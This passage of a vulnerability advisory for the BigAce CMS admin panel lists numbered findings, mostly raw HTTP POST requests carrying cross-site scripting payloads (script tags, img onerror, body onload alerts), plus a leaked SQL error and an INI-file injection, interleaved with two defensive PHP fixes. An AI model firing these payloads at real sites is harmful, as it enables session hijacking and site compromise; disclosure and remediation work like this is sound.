-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

"><script>alert(3)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1053

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

"></textarea><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

21. SQL Injection

<td valign="top">MySQL error (1064:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'x"/onerror="alert(4321)">'' at
line 1) for [SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' AND
id='-1' AND cid='1' AND language=''>"><img/src="x"/onerror="alert(4321)">' ;]
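The error above shows the `language` value being concatenated straight into the `SELECT`, and the full failing query plus the driver error being echoed to the browser. The defensive version binds every value as a parameter, validates that a language id looks like one before it reaches the database, and leaves database errors to the log rather than the page. This is an added example for this post, not BigAce's code; the column names come from the query in the error message, while the PDO connection, the SQLite demo table and the function name are assumptions (the demo needs the pdo_sqlite extension).

```php
<?php
// Added example (not BigAce code): the count query from the error message,
// rewritten with bound parameters and an input check on the language id.
declare(strict_types=1);

/**
 * Count future items for one (itemtype, id, cid, language) tuple.
 * Every value is a bound parameter, so a quote or '>"><img ...>' in the
 * language string is compared as data and can no longer alter the SQL.
 */
function countFutureItems(PDO $db, int $itemtype, int $id, int $cid, string $language): int
{
    // Language ids are short codes like "en" or "de_DE"; refuse anything else
    // up front so that garbage never even reaches the database layer.
    if (!preg_match('/^[a-z]{2}(?:_[A-Z]{2})?\z/', $language)) {
        throw new InvalidArgumentException('invalid language id');
    }

    $stmt = $db->prepare(
        'SELECT COUNT(id) AS amount FROM cms_item_future
          WHERE itemtype = :itemtype AND id = :id AND cid = :cid AND language = :language'
    );
    $stmt->bindValue(':itemtype', $itemtype, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->bindValue(':language', $language, PDO::PARAM_STR);
    $stmt->execute();

    return (int) $stmt->fetchColumn();
}

// --- self-contained demo on an in-memory SQLite database (constructed data) ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cms_item_future (id INTEGER, itemtype INTEGER, cid INTEGER, language TEXT)');
$db->exec("INSERT INTO cms_item_future VALUES (-1, 1, 1, 'en'), (-1, 1, 1, 'de'), (5, 1, 1, 'en')");

echo countFutureItems($db, 1, -1, 1, 'en'), PHP_EOL;   // 1

try {
    // The value from the advisory's error message, decoded.
    countFutureItems($db, 1, -1, 1, '\'>"><img/src="x"/onerror="alert(4321)">');
} catch (InvalidArgumentException $e) {
    // Report a generic problem to the user; the details belong in the server log.
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Even without the regular expression, the bound parameter is what removes the injection; the check is there so that a bad value produces a clean application error instead of a database round trip, and so that the stored value is guaranteed to be a plain code when it is later rendered back into HTML.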
       
22. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52

start='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&amount=10&namespace=&level=
---< request >---

23. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52

start=1560&amount="%20body%20onload%3d"alert(4321)"%3e&namespace=&level=
---< request >---

24. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=community_tADMIN_len HTTP/1.1
Host: 10.149.14.52

s4lv09G4d=j6dbng376&o8F5hJ39y='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&kjhgzt87D=asd
---< request >---

25. xss + info disclosure
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len
Cookie: PHPSESSID=d0mbv9u7103sdm3350bi0gepv0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

mode='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX
---< request >---


26. adding a new community

When you add a new community, the name you enter is written directly to the
file consumer.ini. This can crash your site.
root@bt:/var/www/bigace# grep -n -r -e aaaaaaaa ./
./system/config/consumer.ini:9:[aaaaaaaaaaa]


In this case I changed the 'aaaa' string to HTML code to check whether the page
would show it (as HTML, not as text). HTML injection is possible here.
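Writing a user-supplied name straight into an INI section header means a newline, `[` or `]` in the name rewrites the structure of the file (which is why the site can break), and a `<` in it comes back as markup wherever the name is later displayed. The storage-side fix is to validate the name against the small character set a section header should contain and to refuse duplicates before touching the file. The following is an added example for this post, not BigAce's code; the file name `consumer.ini` and the one-section-per-community layout come from the post, while the key names inside the section and the function names are assumptions.

```php
<?php
// Added example (not BigAce code): appending a [section] to an INI-style
// config file without letting the caller inject extra lines or sections.
declare(strict_types=1);

/**
 * Validate a community (section) name. Section names sit between square
 * brackets on a line of their own, so newline, '[' and ']' must never get in;
 * restricting to a plain identifier also keeps '<', '>', '&' and quotes out,
 * so the stored value is safe to echo (it is still escaped on output).
 * \z rather than $ so a trailing newline cannot sneak past the check.
 */
function isValidCommunityName(string $name): bool
{
    return (bool) preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,62}\z/', $name);
}

/** Quote an INI value, stripping the characters that would end the value or the line. */
function iniValue(string $value): string
{
    return '"' . str_replace(["\r", "\n", '"'], '', $value) . '"';
}

/**
 * Append a [section] with key = "value" lines to $file. Returns false, and
 * writes nothing, when the name fails validation, already exists, or the
 * current file cannot be parsed.
 */
function addIniSection(string $file, string $name, array $values): bool
{
    if (!isValidCommunityName($name)) {
        return false;
    }
    $existing = file_exists($file) ? parse_ini_file($file, true, INI_SCANNER_RAW) : [];
    if ($existing === false || isset($existing[$name])) {
        return false;
    }

    $block = "\n[" . $name . "]\n";
    foreach ($values as $k => $v) {
        // Keys are chosen by our code, not the user, but check them anyway.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*\z/', (string) $k)) {
            return false;
        }
        $block .= $k . ' = ' . iniValue((string) $v) . "\n";
    }
    return file_put_contents($file, $block, FILE_APPEND | LOCK_EX) !== false;
}

// --- constructed demo in a temporary (initially empty) file ---
$ini = tempnam(sys_get_temp_dir(), 'consumer');
var_dump(addIniSection($ini, 'shop', ['domain' => 'shop.example.com', 'lang' => 'en'])); // true
var_dump(addIniSection($ini, "evil]\n[injected", ['domain' => 'x']));                       // false
var_dump(addIniSection($ini, '<b>bold</b>', ['domain' => 'x']));                            // false
var_dump(addIniSection($ini, 'shop', ['domain' => 'dup.example.com']));                    // false
echo file_get_contents($ini);
unlink($ini);
```

Parsing the existing file before appending doubles as a health check: if someone has already managed to corrupt consumer.ini, `parse_ini_file` returns false and the function refuses to make things worse instead of appending to a broken file.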

27. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

28. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---


29. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

30. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=maintenance_tADMIN_len HTTP/1.1
Host: 10.149.14.52

s4lv09G4d=u5FN80Ky&zhtf5fikj=q39854ljh&jhgf854ih='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
---< request >---


31. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

32. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

Cheers o/
